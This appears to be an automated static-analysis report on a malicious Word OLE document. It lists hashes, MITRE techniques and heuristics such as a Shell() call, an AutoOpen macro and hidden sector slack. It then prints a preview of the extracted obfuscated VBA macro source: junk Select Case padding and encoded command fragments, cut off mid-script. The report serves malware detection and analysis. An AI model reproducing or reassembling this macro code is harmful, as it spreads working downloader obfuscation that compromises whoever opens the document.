Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bb93b3cd6df5400…

MALICIOUS

Office (OLE)

172.5 KB Created: 2018-04-26 19:45:00 Authoring application: Microsoft Office Word First seen: 2019-10-29
MD5: 0b46e5d21fd5c1015c4f64fcf1048407 SHA-1: 312ad75456d415e8c457e5a774812dfac4592fc6 SHA-256: 6bb93b3cd6df5400399498c3b0f9b13712716182c81e25ae3cd088fea93982c9
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing legacy WordBasic and Excel 4.0 macro markers, along with significant VBA macros. The critical heuristic firing indicates a Shell() call within the VBA, suggesting the macro attempts to execute arbitrary commands. The obfuscated nature of the VBA code implies it is designed to download and run a secondary payload, a common tactic for initial compromise.

Heuristics 7

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 176,640 bytes but its declared streams total only 27,227 bytes — 149,413 bytes (85%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 58224 bytes
SHA-256: 59328089f00ef9d2977a033d17b613f397d4dd71a618d2b17183fdaf1cadbd1c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rPYOowbT"
Function LCFaIORsGTpzr()
On Error Resume Next
Select Case iQIaO
         Case 76642
            qUSbMi = ociSb
            BbThZR = Round(18503)
            orWdL = Hex(WBtRC - ChrW(WmjYUF))
            ivtQK = mzDwbB
         Case 94661
            TBdwwA = CByte(49077)
            njQPcL = Log(rvMTt)
End Select
GwYGVEpNl = icqQH("@A4k dmMB", KstoL - KstoL + 3 + KstoL - KstoL, KstoL - KstoL + 3 + KstoL - KstoL)
Select Case ZuaLdZ
         Case 18208
            ESQEU = kGcWE
            qIKAuX = Round(50477)
            MBPhED = Hex(HCkUbQ - ChrW(iRAKH))
            dlTpO = kRjaQG
         Case 98630
            GDCiA = CByte(32595)
            dDrCd = Log(RZtAkP)
End Select
Select Case VUwKrG
         Case 35197
            KmOsh = zzXYjQ
            QLluh = Round(14074)
            BMnBlz = Hex(fnXLhE - ChrW(QBvsTY))
            TWhVja = JLPJz
         Case 75073
            zwMGi = CByte(36197)
            KANBM = Log(AJpCOi)
End Select
JLMNt = icqQH(",@a8z^p^S^mnP8N", HbiZS - HbiZS + 5 + HbiZS - HbiZS, HbiZS - HbiZS + 6 + HbiZS - HbiZS)
Select Case hqFjCY
         Case 43048
            bHCiR = TCill
            iIVTU = Round(44289)
            FzVNuQ = Hex(jHtjE - ChrW(wvisL))
            uNhHH = ddEYU
         Case 72650
            fcRVF = CByte(89194)
            SNjLJ = Log(hbJiZ)
End Select
Select Case OURDw
         Case 94269
            aGqNB = YKGnq
            jjZNlR = Round(56080)
            XlGrM = Hex(dqfiB - ChrW(wjnKb))
            HjFwQ = vMBSo
         Case 13621
            lTZBoA = CByte(97416)
            qjifb = Log(jnzvPm)
End Select
SXspkTjrh = icqQH("5q2^o^c^%  z4@GZm", IAcjYs - IAcjYs + 7 + IAcjYs - IAcjYs, IAcjYs - IAcjYs + 8 + IAcjYs - IAcjYs)
Select Case JuSZV
         Case 10900
            AJLBYz = nWiwK
            ORzWTo = Round(28335)
            YBWZV = Hex(cZHcT - ChrW(CAjXhG))
            WwQRwF = GruvF
         Case 62878
            kbHobD = CByte(74096)
            OPGfPa = Log(lcpMK)
End Select
Select Case wwbYda
         Case 5763
            YWjCom = wFcOV
            VwGcH = Round(18358)
            LZkzJi = Hex(IzkBCJ - ChrW(pkuOQL))
            DNWzoF = BVwWRS
         Case 65850
            llsJDF = CByte(676)
            aLLpj = Log(LNqzt)
End Select
QjRLczPGJj = icqQH("425zXvBTqiuAjtttzJbjZ", PHkaUM - PHkaUM + 2 + PHkaUM - PHkaUM, PHkaUM - PHkaUM + 12 + PHkaUM - PHkaUM)
Select Case LNAVZ
         Case 10694
            coflr = qzIWH
            lCswm = Round(55897)
            wpJif = Hex(YZmXl - ChrW(jwzXj))
            ZUnpMD = ipIFSR
         Case 26441
            JIQTGA = CByte(34707)
            bEbXz = Log(JmiMB)
End Select
Select Case XNMRAT
         Case 15579
            cSjumO = rGNWf
            ZFjIia = Round(31039)
            GLUduc = Hex(kdtti - ChrW(SaGAF))
            Zbtrij = zIfIS
         Case 87153
            LVGMRs = CByte(74147)
            GdUczD = Log(fZIcd)
End Select
OihIMuo = icqQH("zPPAL          i", IbGdG - IbGdG + 2 + IbGdG - IbGdG, IbGdG - IbGdG + 10 + IbGdG - IbGdG)
Select Case JNTptq
         Case 59211
            FUbAq = wTuiN
            jVQWB = Round(74013)
            qdFAqP = Hex(CImXX - ChrW(HcBIt))
            GqKLfZ = TJnzz
         Case 75831
            ronAU = CByte(71004)
            oLojWL = Log(CEUHd)
End Select
Select Case toVUBi
         Case 81897
            VwjND = kJjlLK
            GURGZ = Round(45138)
            saWfsv = Hex(zvqXv - ChrW(uzYpbY))
            jRKNq = hmUEO
         Case 52755
            uIvbB = CByte(39903)
            imOsO = Log(OHHvc)
End Select
ZsUiozfz = icqQH("kKP   %^c^E^p^Szn", fJjRZ - fJjRZ + 4 + fJjRZ - fJjRZ, fJjRZ - fJjRZ + 11 + fJjRZ - fJjRZ)
Select Case BKMaPJ
         Case 78530
            Odcqcv = BlEzoG
            iwDRz = Round(51036)
            ZfYcja = Hex(ihfRM - ChrW(tFKXPS))
            NVDwoY = jQXwKO
         Case 71674
            zDOtVj = CByte(36269)
            YfbTW = Log(mjBju)
End Select
Select Case w
... (truncated)